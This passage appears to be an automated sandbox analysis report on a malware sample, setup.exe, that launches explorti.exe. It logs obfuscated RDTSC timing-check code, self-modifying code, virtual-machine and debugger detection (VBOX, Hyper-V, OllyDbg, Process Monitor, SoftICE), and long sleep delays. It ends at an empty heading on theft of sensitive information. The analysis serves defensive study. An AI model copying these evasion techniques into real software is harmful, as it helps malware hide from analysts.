                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0CDF second address: 4DF0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CFB71FAh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0CF6 second address: 4DF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007FF32CDD656Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FF32CDD6569h 0x00000013 jmp 00007FF32CDD6570h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, 37BA5829h 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0D2E second address: 4DF0D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF32CFB7209h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF32CFB71FCh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0D6E second address: 4DF0D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0D80 second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FF32CFB7209h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB71FDh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0526 second address: 4DA052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA052C second address: 4DA0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0530 second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007FF32CDD6570h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF32CDD656Dh 0x0000001f and ax, E536h 0x00000024 jmp 00007FF32CDD6571h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FF32CDD6570h 0x00000030 sbb ecx, 2AE92C58h 0x00000036 jmp 00007FF32CDD656Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA05A5 second address: 4DA05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA05A9 second address: 4DA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FF32CFB7200h 0x00000010 push FDA9B50Dh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a add dword ptr [esp], 79980B0Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bl, ah 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA05F1 second address: 4DA0649 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD656Fh 0x00000008 add ch, FFFFFFDEh 0x0000000b jmp 00007FF32CDD6579h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 call 00007FF32CDD6569h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF32CDD6579h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0649 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, ebx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0679 second address: 4DA0731 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6579h 0x00000008 and ax, D986h 0x0000000d jmp 00007FF32CDD6571h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF32CDD6570h 0x0000001b add ch, 00000028h 0x0000001e jmp 00007FF32CDD656Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FF32CDD6579h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF32CDD6571h 0x00000035 pop eax 0x00000036 jmp 00007FF32CDD656Eh 0x0000003b mov eax, dword ptr fs:[00000000h] 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 mov ecx, 176D2139h 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FF32CDD656Eh 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0731 second address: 4DA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0740 second address: 4DA0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 94h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0747 second address: 4DA0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF32CFB7207h 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 add ax, 5808h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ecx 0x00000022 popad 0x00000023 sub esp, 1Ch 0x00000026 pushad 0x00000027 mov esi, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d push esi 0x0000002e jmp 00007FF32CFB7202h 0x00000033 mov dword ptr [esp], ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FF32CFB71FEh 0x0000003d adc ch, FFFFFFC8h 0x00000040 jmp 00007FF32CFB71FBh 0x00000045 popfd 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, si 0x00000050 pushfd 0x00000051 jmp 00007FF32CFB7208h 0x00000056 xor ecx, 77A45258h 0x0000005c jmp 00007FF32CFB71FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0806 second address: 4DA084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD656Eh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov eax, 3666D7ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, esi 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA084F second address: 4DA0877 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1B0168EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov esi, 576EE9BFh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7201h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0877 second address: 4DA0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FF32CDD656Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 movzx ecx, dx 0x0000001a call 00007FF32CDD6573h 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 xor eax, ebp 0x00000025 pushad 0x00000026 mov al, 9Eh 0x00000028 popad 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF32CDD6572h 0x00000030 jmp 00007FF32CDD6572h 0x00000035 popad 0x00000036 mov dword ptr [esp], eax 0x00000039 jmp 00007FF32CDD6570h 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CDD6577h 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0919 second address: 4DA0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB71FFh 0x00000009 or ax, A41Eh 0x0000000e jmp 00007FF32CFB7209h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 mov eax, 0E068F39h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DA0960 second address: 4DA0A94 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6570h 0x00000008 sbb cl, 00000048h 0x0000000b jmp 00007FF32CDD656Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007FF32CDD6576h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FF32CDD6570h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 mov ax, 806Dh 0x0000002b mov bx, ax 0x0000002e popad 0x0000002f jne 00007FF39F3758CEh 0x00000035 jmp 00007FF32CDD6574h 0x0000003a sub eax, eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF32CDD6577h 0x00000043 sbb ch, FFFFFFFEh 0x00000046 jmp 00007FF32CDD6579h 0x0000004b popfd 0x0000004c push esi 0x0000004d pushfd 0x0000004e jmp 00007FF32CDD6577h 0x00000053 sbb cl, 0000000Eh 0x00000056 jmp 00007FF32CDD6579h 0x0000005b popfd 0x0000005c pop ecx 0x0000005d popad 0x0000005e mov dword ptr [ebp-20h], eax 0x00000061 jmp 00007FF32CDD6577h 0x00000066 mov ebx, dword ptr [esi] 0x00000068 jmp 00007FF32CDD6576h 0x0000006d mov dword ptr [ebp-24h], ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FF32CDD6577h 0x00000077 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 31EFBC second address: 31E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CFB7208h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CFB71F7h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CFB7209h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CFB71FCh 0x00000081 jp 00007FF32CFB71F6h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 31E7EC second address: 31E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CDD6566h 0x00000010 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 479D49 second address: 479D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CFB7205h 0x0000000a jl 00007FF32CFB71F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 495EAE second address: 495EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 495EB2 second address: 495F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CFB7208h 0x00000011 jmp 00007FF32CFB7209h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 495F02 second address: 495F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 495F07 second address: 495F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 496060 second address: 49609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD656Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CDD6566h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CDD6566h 0x0000001f popad 0x00000020 jmp 00007FF32CDD6575h 0x00000025 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 4961D3 second address: 4961E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CFB71F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 498DBA second address: 498E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CDD6569h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CDD6568h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CDD656Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRDTSC instruction interceptor: First address: 498E34 second address: 498E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: C8E792 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: C8E835 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: E2F857 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: E3CFB4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: EC77FB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 31E792 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 31E835 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 4BF857 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 4CCFB4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 5577FB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04DF04DA rdtsc 0_2_04DF04DA
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 408Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 499Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 8164Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416Thread sleep count: 49 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416Thread sleep time: -98049s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424Thread sleep time: -78039s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740Thread sleep count: 408 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740Thread sleep time: -12240000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3660Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040Thread sleep count: 499 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040Thread sleep time: -998499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040Thread sleep count: 8164 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040Thread sleep time: -16336164s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: explorti.exe, 0000000A.00000002.3368400813.000000000174B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: setup.exe, 00000000.00000002.2185921092.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2229049085.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.2230169054.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04DF04DA rdtsc 0_2_04DF04DA
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002E645B mov eax, dword ptr fs:[00000030h]10_2_002E645B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002EA1C2 mov eax, dword ptr fs:[00000030h]10_2_002EA1C2
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 35Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002CD312 cpuid 10_2_002CD312
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,10_2_002CCB1A
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002B65B0 LookupAccountNameA,10_2_002B65B0

                    Stealing of Sensitive Information

                    barindex
